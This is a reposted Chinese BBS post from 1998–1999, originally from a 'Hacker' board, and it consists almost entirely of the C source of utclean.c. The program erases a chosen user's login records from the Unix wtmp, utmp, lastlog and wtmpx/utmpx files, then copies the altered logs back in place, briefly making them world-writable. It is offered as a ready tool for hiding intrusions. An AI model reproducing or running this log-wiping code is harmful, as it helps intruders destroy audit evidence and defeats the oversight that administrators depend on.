发信人: tcpip (俺的昵称改了), 信区: cnunix
标 题: [转载] 关于/var/adm/utmp(x),wtmp(x),lastlog (总结,即给
发信站: 哈工大紫丁香 (Sun Sep 26 14:55:57 1999), 转信
发信人: cpu (奔腾的心), 信区: Solaris
发信站: 华南网木棉站 (Thu Jun 25 14:26:35 1998), 转信
【 以下文字转载自 Hacker 讨论区 】
【 原文由 cpu 所发表 】
/*utclean.c - cleans wtmp/wtmpx/utmp/utmpx/lastlog*/
/*Usage: utclean <username> <fixthings?> [hostname]*/
/*Written by undrtaker (undtaker@xxx.xxxxxxx.xxx.xx) - drop me a line*/
/*cpu 稍事整理 */
/* * * hostname only affects wtmp/wtmpx (would u like it to utmp?)*/
#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>
#include <stdio.h>
#include <pwd.h>
#define LASTLOG /* we always clean wtmp/utmp. Lastlog and ?tmpx, up to u. */
/* #define WTMPX */
#ifdef WTMPX
#include <utmpx.h>
#endif
main(argc, argv)
int argc;
char *argv[];
{
#ifdef WTMPX
struct utmpx utx;
#endif
struct lastlog l;
int entries = 0, removed = 0, done = 0, size, onlyhost;
struct utmp ut;
struct passwd *p_passwd;
uid_t uid;
int fp = -1,fd = -1;
char *username, *host;
if ( (argc != 3) && (argc != 4) ) {
fprintf(stderr,
"usage: %s <username> <fixthings> [hostname]\n",argv[0]);
exit(2);
}
size = sizeof(ut);
username = argv[1];
if ((p_passwd = getpwnam(username)) == NULL) {
fprintf(stderr,
"%s doesn't exit in passwd file\n", username);
exit(3);
}
uid = p_passwd->pw_uid;
if (argc == 4) {
host = argv[3]; onlyhost=1;
} else
onlyhost = 0;
fp = open("/var/adm/wtmp", O_RDONLY);
fd = open("wtmp.tmp", O_WRONLY|O_CREAT);
if (fp < 0) {
perror("wtmp"); close(fd);
} else if (fd < 0) {
perror("wtmp.tmp"); close(fp);
} else {
while (read(fp, &ut, size) == size) {
if ((strncmp(ut.ut_name, username, 8))
|| (onlyhost ) )
write(fd, &ut, size);
else
removed++;
entries++;
}
printf("\nwtmp: %i entries removed (total: %i)",
removed, entries);
close(fp);
close(fd);
}
entries = removed = 0;
size = sizeof(struct utmp);
fd = open("/etc/utmp", O_RDWR);
if (fd < 0) perror("utmp");
else {
while (read(fd, &ut, size) == size) {
if (!strncmp(ut.ut_user, username, 8)) {
removed++;
memset(&ut, 0, size);
lseek(fd, -1*size, SEEK_CUR);
write(fd, &ut, size);
}
entries++;
}
close(fd);
printf("\nutmp: %i entries removed. (total: %i)",
removed, entries);
}
#ifdef LASTLOG
entries = removed = 0;
size = sizeof(struct lastlog);
fd = open("/var/adm/lastlog", O_RDWR);
if (fd < 0) perror("lastlog");
else {
lseek(fd, size * uid, SEEK_SET);
read(fd, &l, size);
l.ll_time = 0;
strncpy(l.ll_line, " ", 8);
strncpy(l.ll_host, " ", 16);
lseek(fd, size * uid, SEEK_SET);
write(fd, &l, size);
close(fd);
printf("\nlastlog: fixed");
}
#endif
#ifdef WTMPX
size = sizeof(utx);
fp = open("/var/adm/wtmpx", O_RDONLY);
fd = open("wtmpx.tmp", O_WRONLY|O_CREAT);
if (fp < 0) { perror("wtmpx"); close(fd); }
else if (fd < 0) { perror("wtmpx.tmp"); close(fp); }
else {
while (read(fp,&utx,size)==size) {
if( (strncmp(utx.ut_name,username,strlen(username)))
|| (onlyhost && (!strstr(utx.ut_host,host))) )
write(fd,&utx,size);
else removed++;
entries++;
}
printf("\nwtmpx: %i entries removed (total: %i)",
removed, entries);
close(fp);
close(fd);
}
entries = removed = 0;
fd = open("/etc/utmpx", O_RDWR);
if (fd < 0) perror("utmpx");
else {
while (read(fd, &utx, size) == size) {
if (!strncmp(utx.ut_user, username, strlen(username))) {
removed++;
memset(&utx, 0, size);
lseek(fd, -1*size, SEEK_CUR);
write(fd, &utx, size);
}
entries++;
}
close(fd);
printf("\nutmpx: %i entries removed. (total: %i)",
removed, entries);
}
#endif
if(argv[2][0] == 'y'){
chmod("./wtmp.tmp", 0666);
chmod("./wtmpx.tmp", 0666);
printf("\n\nold wtmp log file:\n");
system("ls -la /var/adm/wtmp*");
chmod("/var/adm/wtmp", 0666);
chmod("/var/adm/wtmpx", 0666);
system("/bin/cp ./wtmp.tmp /var/adm/wtmp ; rm ./wtmp.tmp");
system("/bin/cp ./wtmpx.tmp /var/adm/wtmpx ; rm ./wtmpx.tmp");
chmod("/var/adm/wtmp", 0664);
chmod("/var/adm/wtmpx", 0000);
printf("\nnew wtmp log file:\n");
system("ls -la /var/adm/wtmp*");
printf("\nfixthings: done.");
}
printf("\n\n...that's it. peace man :)\n\n");
}
--
******************************************************
蓦然回首,老子已是高级战友 。。。 。。。
******************************************************
※ 修改:.trueip 于 Sep 26 14:59:33 修改本文.[FROM: dns.mtlab.hit.ed]
※ 来源:.华南网木棉站 bbs.gznet.edu.cn.[FROM: 202.101.248.6]
--
--
※ 转寄:.华南网木棉站 bbs.gznet.edu.cn.[FROM: dns.mtlab.hit.ed]
--
☆ 来源:.哈工大紫丁香 bbs.hit.edu.cn.[FROM: trueip.bbs@melon.gzn]